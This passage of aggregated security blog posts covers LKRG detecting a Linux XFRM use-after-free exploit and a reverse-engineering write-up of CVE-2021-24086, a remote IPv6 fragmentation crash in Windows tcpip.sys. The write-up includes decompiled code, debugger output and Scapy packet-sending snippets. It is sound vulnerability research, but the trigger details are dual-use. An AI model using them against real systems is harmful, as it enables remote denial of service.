The logic responsible for handling ->exit_signal has been changed a few times and the current logic is locked down since Linux kernel 3.3.5. However, it is not fully robust and it’s still possible for the malicious user to bypass it. Basically, it’s possible to send arbitrary signals to a privileged (suidroot) parent process.

I’ve summarized my analysis and posted on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure

Thanks,
Adam

pi3 blog
Linux kernel XFRM UAFpi3
21 March 2020 at 01:27

Linux kernel XFRM UAF

pi3 blog

By: pi3

21 March 2020 at 01:27

On 28th of February, I’ve sent a short summary to lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading and I’ve decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX
— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

Latest LKRG detects user_namespace corruption, which in a way proofs that our namespace escape logic works. When I’ve made the same test, but reverting LKRG code base to the commit just before namespace corruption detection, LKRG is still detecting it via standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
 [Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different GID! 1000 vs 0
 [Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
 [Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different GID! 1000 vs 0
 [Fri Feb 28 10:34:28 2020] [p_lkrg]  Trying to kill process[lucky0 | 17599]!
 …
 [Fri Feb 28 10:35:02 2020] [p_lkrg]  process[22293 | lucky0] has different SUID! 1000 vs 0
 [Fri Feb 28 10:35:02 2020] [p_lkrg]  process[22293 | lucky0] has different GID! 1000 vs 0
 [Fri Feb 28 10:35:02 2020] [p_lkrg]  process[22293 | lucky0] has different SUID! 1000 vs 0
 [Fri Feb 28 10:35:02 2020] [p_lkrg]  process[22293 | lucky0] has different GID! 1000 vs 0
 [Fri Feb 28 10:35:02 2020] [p_lkrg]  Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not a source code). This means that adopting his exploit to play cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer it and modify the exploit binary, however it’s more work.

Thanks,

Adam

Diary of a reverse-engineer
Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)Axel "0vercl0k" Souchet
15 April 2021 at 15:00

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Diary of a reverse-engineer

By: Axel "0vercl0k" Souchet

15 April 2021 at 15:00

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

Table of contents:

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions

Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):

int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}

1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.

Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

